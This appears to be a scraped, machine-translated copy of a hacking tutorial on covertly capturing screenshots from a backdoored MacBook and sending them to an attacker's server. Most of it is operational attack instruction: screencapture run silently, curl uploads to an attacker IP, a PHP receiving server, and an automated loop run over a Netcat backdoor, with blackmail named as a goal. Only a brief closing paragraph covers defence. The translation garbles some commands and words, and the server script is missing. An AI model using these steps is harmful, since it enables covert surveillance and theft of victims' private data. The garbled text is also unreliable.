قالب وردپرس درنا توس
Home / Tips and Tricks / How To Automate Screenshot Exfiltration From A Backdoored MacBook «Zero Byte :: WonderHowTo

How To Automate Screenshot Exfiltration From A Backdoored MacBook «Zero Byte :: WonderHowTo



Gmail conversations, private Facebook messages, and personal photos can all be viewed by a hacker who has backdoor access to a target's Mac. Livestreaming the desktop or exfiltrating screenshots can be used for blackmail and targeted social engineering attacks to further compromise the brand.

Livestreaming the entire Mac desktop may not be ideal for any information gathering scenario. A big disadvantage when streaming video is the high CPU consumption. If you stream with a high frame rate, the MacBook CPU will heat up, which can make the target suspect. Streaming also requires additional third-party software to work. This software can be detected by antivirus software or the target itself.

A lesser approach to livestreaming is screenshot exfiltration. And by quiet I mean, produce minimal traffic on the network and reduce CPU usage. After all, someone watching network traffic as we stream the target's desktop will likely notice the nefarious data from the device.

Using the Command-Line Tool Screencapture

Screencapture is a macOS (formerly Mac OS) built-in command-line tool called X), and it is capable of capturing screenshots of the entire macOS desktop. To view the available screencapture options and arguments, use the command man to access the manual.

  SCREENAPTURE (1
) BSD General Commands Manual SCREENAPTURE (1) SURNAME screencapture - take pictures from the screen and save them to a file or the clipboard SUMMARY screen capture [-SWCTMPcimswxto] file DESCRIPTION The Screencapture utility is not well documented so far. A list of Options follows. -c Force screen capture to go to the clipboard. -C Capture the cursor as well as the screen. Only allowed in not interactive modes. -i Capture screen interactively by selection or window. the Con- The Ctrl key moves the screenshot to the clipboard. The Space bar toggles between mouse selection and window selection Modes. The escape key aborts the interactive screen Shot. -m Captures only the main monitor undefined if -i is set. -M Open the recorded image in a new e-mail message. -o Do not capture the shadow of the window in windowed mode. -P Open the captured image in a preview window. -s Allows only mouse selection mode. -S In the window capture mode, capture the screen instead of the window. -t image format to create, default is png (other options contain pdf, jpg, tiff and other formats). -T Take the picture after a delay of is standard 5th -w Allows only the window selection mode. -W Start the interaction in the window selection mode. -x Do not play sounds. -a Do not capture attached windows. -r Do not add screen dpi metadata to the captured file. -b capture touch bar, works only in non-interactive modes. Files in which the screen capture is to be saved, 1 file per screen error This utility requires better documentation. security considerations To capture the screen content while logged in via ssh, you need to start screencapture in the same mach bootstrap hierarchy as loginwindow: PID = pid of the login window sudo launchctl bsexec $ PID screencapture [options] STORY A Screencapture utility first appeared in Mac OS X v10.2. Mac OS June 16, 2004 Mac OS

Following is an example of a screencapture command, followed by justification of some of its options / arguments and the resulting image file.

  screencapture -C -x -t jpg / tmp / image && curl -F "image = @ / tmp / image" & # 39; http: //1.2.3.4' 
  • Capturing the mouse pointer of the target is not required, but can be enabled with the argument -C . This can sometimes help to understand what the goal is in a given screenshot.
  • There are many supported image output formats ( -t ) such as PNG, PDF and TIFF. The JPG format was used in my example because it is one of the most common and leads to smaller image sizes. This generally makes exfiltrating screenshots faster.
  • Screencapture will produce a very audible camera sound effect when the command is executed. The argument -x suppresses the camera sound effect. For that reason, it is necessary – if you hope to avoid the discovery.
  • Where the image is saved ( /tmp/image.jpg ) is appended to the end of the command. This directory can be located on the device of the destination. However, directly using ~ / Pictures or ~ / Desktop almost certainly leads to detection. Files in / tmp are automatically deleted when macOS is restarted.

Running this screencapture command from a Netcat backdoor does not alert the target user in any way. That's all that goes with it.

Now getting screenshots from the target device can be challenging, especially if the firewall is enabled. We need an easy way to get screenshots of the target's MacBook on our Kali system. To do that, we use cURL to send the screenshots from the MacBook, and a simple PHP server in Kali to intercept and save the images.

Step 1: Prepare for Screenshot Exfiltration

Use the following command apt-get to install PHP.

  apt-get install php

Read package lists ... Done
Create dependency structure
Read status information ... Done
The following additional packages will be installed:
libapache2-mod-php7.2 (7.2.4-1 + b2)
libsodium23 (1.0.16-2)
php-common (1:61)
php7.2 (7.2.4-1)
php7.2-cli (7.2.4-1 + b2)
php7.2-common (7.2.4-1 + b2)
php7.2-json (7.2.4-1 + b2)
php7.2-opcache (7.2.4-1 + b2)
php7.2-readline (7.2.4-1 + b2)
psmisc (23.1-1 + b1)
Recommended packages:
PHP bulb (1: 1.10.5 + submodules + notgz-1)
The following NEW packages will be installed:
libapache2-mod-php7.2 (7.2.4-1 + b2)
libsodium23 (1.0.16-2)
PHP (1: 7.2 + 61)
php-common (1:61)
php7.2 (7.2.4-1)
php7.2-cli (7.2.4-1 + b2)
php7.2-common (7.2.4-1 + b2)
php7.2-json (7.2.4-1 + b2)
php7.2-opcache (7.2.4-1 + b2)
php7.2-readline (7.2.4-1 + b2)
psmisc (23.1-1 + b1)
0 updated, 11 reinstalled, 0 removed and 97 not updated.
Need 4,186 kB of archives.
After this operation, 18.1 MB of additional space will be used.
Do you want to continue? [Y/n] y 

Make ( mkdir ) a directory in which the PHP server and screenshots are stored. The directory name "phpServer" is arbitrary and can be renamed as required.

  mkdir phpServer 

Change ( cd ) to the newly created directory phpServer /

  cd phpServer / 

Use nano (or your favorite text editor), to create a file "index.php". This file contains the following PHP script, which automatically sends JPG screenshots from the macOS device and saves them locally.

  nano index.php 

Copy the following PHP script into the file index.php and save it. This is a very simple PHP script and you do not have to change a single line for it to work.

   

This allows us to start the PHP server with the following command. The command will instruct PHP to launch a server ( -S ) on every available interface ( 0.0.0.0 ) on port 80 .

  php -S 0.0.0.0:80

Step 2: Use cURL to send images

From BackDoctor MacBook it is now possible to extract screenshots. With a single command we can use cURL to send a file of our choice to the PHP server of our Kali system.

  curl -F "image=@/tmp/image.jpg" & # 39; http: //1.2.3.4 

When screenshots are received from the PHP server, new lines appear in the terminal reading "[200]: / ". This is an indication that the server is working and a new screenshot has been received.

  php -S 0.0.0.0:80

PHP 7.2.4-1 + b2 development server started
Listen to http://0.0.0.0:80
Document root is / root / Desktop / phpServer
Press Ctrl-C to exit.
[Sat Aug 2018] 192.168.0.98:50235 [200]: /
[Sat Aug 2018] 192.168.0.98:50236 [200]: /
[Sat Aug 2018] 192.168.0.98:50237 [200]: /
[Sat Aug 2018] 192.168.0.98:50238 [200]: /
[Sat Aug 2018] 192.168.0.98:50239 [200]: /
[Sat Aug 2018] 192.168.0.98:50240 [200]: /
[Sat Aug 2018] 192.168.0.98:50241 [200]: /
[Sat Aug 2018] 192.168.0.98:50242 [200]: /
[Sat Aug 2018] 192.168.0.98:50243 [200]: /
[Sat Aug 2018] 192.168.0.98:50244 [200]: /
[Sat Aug 2018] 192.168.0.98:50248 [200]: / 

Step 3: Automate Screenshots and Exfiltrations at Intervals

Exfiltrating a single screenshot is easy, but it's not practical if we take a large number of screenshots have to collect a longer period of time. Instead, we can create a for loop to automatically reuse the screencapture command over and over again. In the loop, we can also automate the cURL command immediately after completing the Screencapture command.

Below is an example of a For loop that can be run through Netcat backdoor.

  for count in {1..25}; screencapture -C -x -t jpg /tmp/image.jpg && curl -F "image=@/tmp/image.jpg" & # 39; http: //1.2.3.4' && sleep 5; done 
  • Here I use && to chain commands together.
  • This loop will take 25 ( {1..25} ) screenshots before it stops. [19659010] The other important bit is the command sleep which I attached to the loop. Sleep will have the loop taking a 5-second break between screenshots. This value can be increased or decreased as needed.

Screenshots obtained can be found in phpServer /

Preventing this type of attack on your Mac

This screencapture command is just one of many commands , which are integrated in the operating system macOS and can be abused by hackers. Just about to remove screencapture and cURL by force, you can not do much to prevent such activity on your MacBook, Mac Pro or any other Mac computer. Better physical security practices such as that allow a firmware password and encrypt the hard drive prevent attackers from gaining access to your macOS devices.

Do not Miss: How to Listen to Anyone in Real Time MacBook Microphone

Cover photo by Tranmautritam / PEXELS; Screenshots of tokyoneon / zero byte

Source link